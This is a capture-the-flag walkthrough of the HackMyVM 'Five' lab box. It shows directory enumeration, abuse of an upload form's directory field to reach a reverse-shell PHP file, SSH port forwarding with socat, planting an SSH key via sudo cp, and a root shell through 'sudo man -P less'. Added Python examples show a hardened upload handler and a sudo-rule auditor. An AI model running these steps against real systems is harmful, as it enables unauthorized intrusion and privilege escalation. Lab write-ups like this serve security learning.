HackmyVM-Five


Information gathering

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:dd:ef:c8 PCS Systemtechnik GmbH
192.168.31.177 08:00:27:fe:58:c8 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.411 seconds (106.18 hosts/sec). 3 responded
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# rustscan -a 192.168.31.177 -r 1-65535
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 192.168.31.177:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-07 01:31 EDT
Initiating ARP Ping Scan at 01:31
Scanning 192.168.31.177 [1 port]
Completed ARP Ping Scan at 01:31, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:31
Completed Parallel DNS resolution of 1 host. at 01:31, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:31
Scanning 192.168.31.177 [1 port]
Discovered open port 80/tcp on 192.168.31.177
Completed SYN Stealth Scan at 01:31, 0.02s elapsed (1 total ports)
Nmap scan report for 192.168.31.177
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-05-07 01:31:14 EDT for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:FE:58:C8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Only port 80 is open.

Port 80

The home page returns 403, so enumerate directories.

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# gobuster dir -u "http://192.168.31.177" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.177
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 185] [--> http://192.168.31.177/uploads/]
/admin (Status: 301) [Size: 185] [--> http://192.168.31.177/admin/]
/upload.php (Status: 200) [Size: 48]
/robots.txt (Status: 200) [Size: 17]
/upload.html (Status: 200) [Size: 346]

/robots.txt points to /admin, and there is also an upload.html that allows file uploads. After uploading, requesting uploads/rev.php returns 403, so capture the request in Burp and take a look.

------WebKitFormBoundaryRK8GGBtt0YpPaKBf
Content-Disposition: form-data; name="directory"

uploads/
------WebKitFormBoundaryRK8GGBtt0YpPaKBf
Content-Disposition: form-data; name="submit"

Upload File
------WebKitFormBoundaryRK8GGBtt0YpPaKBf--

The request body carries an upload path. Delete the uploads/ value and resend; /rev.php is now reachable. Start a listener and catch the reverse shell.
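As an added illustration from the defender's side (not code from the box or from this walkthrough): the upload form above lets the client choose the target directory through the "directory" field, which is why removing uploads/ moves the file into the web root. The Python below contrasts that pattern with a handler that chooses the directory and the stored file name itself, allowlists non-executable extensions, and re-checks that the final path stays inside the upload root. WEBROOT, the allowlist and the request field values are constructed assumptions; the box's real upload.php is not shown on the page.

```python
import os
import secrets

# Constructed request fields, mirroring the multipart body captured above.
CLIENT_DIRECTORY_FIELD = "uploads/"
CLIENT_FILENAME = "rev.php"

# Assumed on-disk layout: the walkthrough only shows the /uploads/ URL, not the webroot.
WEBROOT = "/var/www/html"
UPLOAD_ROOT = os.path.join(WEBROOT, "uploads")

# Illustrative allowlist of non-executable types (an assumption of this example).
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt"}


def unsafe_destination(webroot, directory_field, filename):
    """Vulnerable pattern: the client's 'directory' field decides where the file lands.

    An empty field drops the file into the webroot; an absolute field escapes it
    entirely, because os.path.join discards everything before an absolute component.
    """
    return os.path.join(webroot, directory_field, filename)


def is_confined(root, candidate):
    """True only if candidate resolves to a path inside root ('..' and symlinks resolved)."""
    root_real = os.path.realpath(root)
    cand_real = os.path.realpath(candidate)
    return os.path.commonpath([root_real, cand_real]) == root_real


def safe_destination(upload_root, filename):
    """Hardened pattern: the server chooses the directory and the stored name.

    Only the extension of the client filename is kept, and only if it is on the
    allowlist; the basename is replaced by a random token so the caller cannot
    pick a name like rev.php. The final path is re-checked for confinement.
    """
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    stored_name = secrets.token_hex(16) + ext
    dest = os.path.join(upload_root, stored_name)
    if not is_confined(upload_root, dest):
        raise ValueError("destination escapes the upload directory")
    return dest


if __name__ == "__main__":
    print("unsafe, field as sent:", unsafe_destination(WEBROOT, CLIENT_DIRECTORY_FIELD, CLIENT_FILENAME))
    print("unsafe, field emptied:", unsafe_destination(WEBROOT, "", CLIENT_FILENAME))
    try:
        safe_destination(UPLOAD_ROOT, CLIENT_FILENAME)
    except ValueError as err:
        print("safe rejects rev.php: ", err)
    print("safe accepts an image:", safe_destination(UPLOAD_ROOT, "photo.png"))
```

The confinement check alone would not have stopped this box's upload (uploads/rev.php is inside the upload root); what stops it is that the server, not the client, decides both the directory and whether a .php file is accepted at all.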

Privilege escalation to melisa

www-data@five:/$ sudo -l
Matching Defaults entries for www-data on five:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on five:
(melisa) NOPASSWD: /bin/cp
www-data@five:/tmp$ ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port

udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*

tcp LISTEN 0 128 127.0.0.1:4444 0.0.0.0:*

tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=409,fd=6))

tcp LISTEN 0 128 [::]:80 [::]:* users:(("nginx",pid=409,fd=7))
www-data@five:/tmp$ nc 127.0.0.1 4444
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

Port 4444 is an SSH service, so forward it out with socat.

socat TCP-LISTEN:4445,fork TCP4:127.0.0.1:4444 &

Then cp a public key into place.

www-data@five:/tmp$ ls
authorized_keys
systemd-private-51833796905d4c16b06d8f390a64e61b-systemd-timesyncd.service-LEvzQE
user.txt
www-data@five:/tmp$ sudo -u melisa cp ./authorized_keys /home/melisa/.ssh

Privilege escalation to root

melisa@five:~$ sudo -l
Matching Defaults entries for melisa on five:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melisa may run the following commands on five:
(ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm, /bin/clear
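As an added defender-side example (not part of the walkthrough): both sudo -l listings on this box contain entries an auditor would flag, cp running as melisa and man running as root with SETENV. The Python below parses sudo -l output of the form shown above and reports entries whose binaries can write files or hand the caller an interactive child process, and notes when SETENV lets the caller pick the pager environment. The two sample texts are the outputs from this page; the classification sets are an illustrative assumption, not a complete list.

```python
import re
from dataclasses import dataclass

# Constructed samples: the two `sudo -l` outputs shown in this walkthrough.
SUDO_L_WWW_DATA = r"""Matching Defaults entries for www-data on five:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on five:
    (melisa) NOPASSWD: /bin/cp
"""

SUDO_L_MELISA = r"""Matching Defaults entries for melisa on five:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melisa may run the following commands on five:
    (ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm, /bin/clear
"""

# Illustrative classification (an assumption of this example, not an exhaustive list).
SPAWNS_CHILD = {"man", "less", "more", "vi", "vim"}  # pagers/editors that start a child process
WRITES_FILES = {"cp", "mv", "tee", "dd"}             # write to arbitrary paths as the target user
DELETES_FILES = {"rm"}                               # delete arbitrary paths as the target user


@dataclass
class SudoEntry:
    runas: str        # text inside the parentheses, e.g. "melisa" or "ALL"
    tags: list        # e.g. ["SETENV", "NOPASSWD"]
    commands: list    # e.g. ["/bin/pwd", "/bin/arch", ...]


@dataclass
class Finding:
    command: str
    reason: str


ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<rest>\S.*)$")


def parse_sudo_l(text):
    """Parse the command entries that follow 'may run the following commands'."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tokens = m.group("rest").split()
        tags = []
        # Leading upper-case words ending in ':' are sudoers tags (SETENV:, NOPASSWD:, ...).
        while tokens and tokens[0].endswith(":") and tokens[0][:-1].isupper():
            tags.append(tokens.pop(0)[:-1])
        commands = [c.strip() for c in " ".join(tokens).split(",") if c.strip()]
        entries.append(SudoEntry(m.group("runas").strip(), tags, commands))
    return entries


def audit(entries):
    """Return one Finding per risky command; harmless binaries (id, pwd, ...) yield none."""
    findings = []
    for e in entries:
        for cmd in e.commands:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SPAWNS_CHILD:
                findings.append(Finding(cmd, f"runs as {e.runas} and can start a child process"))
                if "SETENV" in e.tags:
                    findings.append(Finding(cmd, "SETENV lets the caller set PAGER/MANPAGER"))
            elif binary in WRITES_FILES:
                findings.append(Finding(cmd, f"writes arbitrary files as {e.runas}"))
            elif binary in DELETES_FILES:
                findings.append(Finding(cmd, f"deletes arbitrary files as {e.runas}"))
    return findings


if __name__ == "__main__":
    for sample in (SUDO_L_WWW_DATA, SUDO_L_MELISA):
        for f in audit(parse_sudo_l(sample)):
            print(f"{f.command}: {f.reason}")
```

The fix on the sudoers side is the same in both cases: grant the narrowest command possible (cp with a fixed source and destination, or a wrapper script instead of man), and drop SETENV unless a specific variable is needed.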

man can be run as root.

sudo man man
!/bin/sh

This doesn't work, because the program used for paging is pager.

Controlling formatted output
-P pager, --pager=pager
Specify which output pager to use. By default, man uses pager, falling back to cat if pager is not
found or is not executable. This option overrides the $MANPAGER environment variable, which in turn
overrides the $PAGER environment variable. It is not used in conjunction with -f or -k.

The value may be a simple command name or a command with arguments, and may use shell quoting (back‐
slashes, single quotes, or double quotes). It may not use pipes to connect multiple commands; if you
need that, use a wrapper script, which may take the file to display either as an argument or on stan‐
dard input.

Specifying less as the pager command is enough.

melisa@five:~$ sudo man -P less id
!bash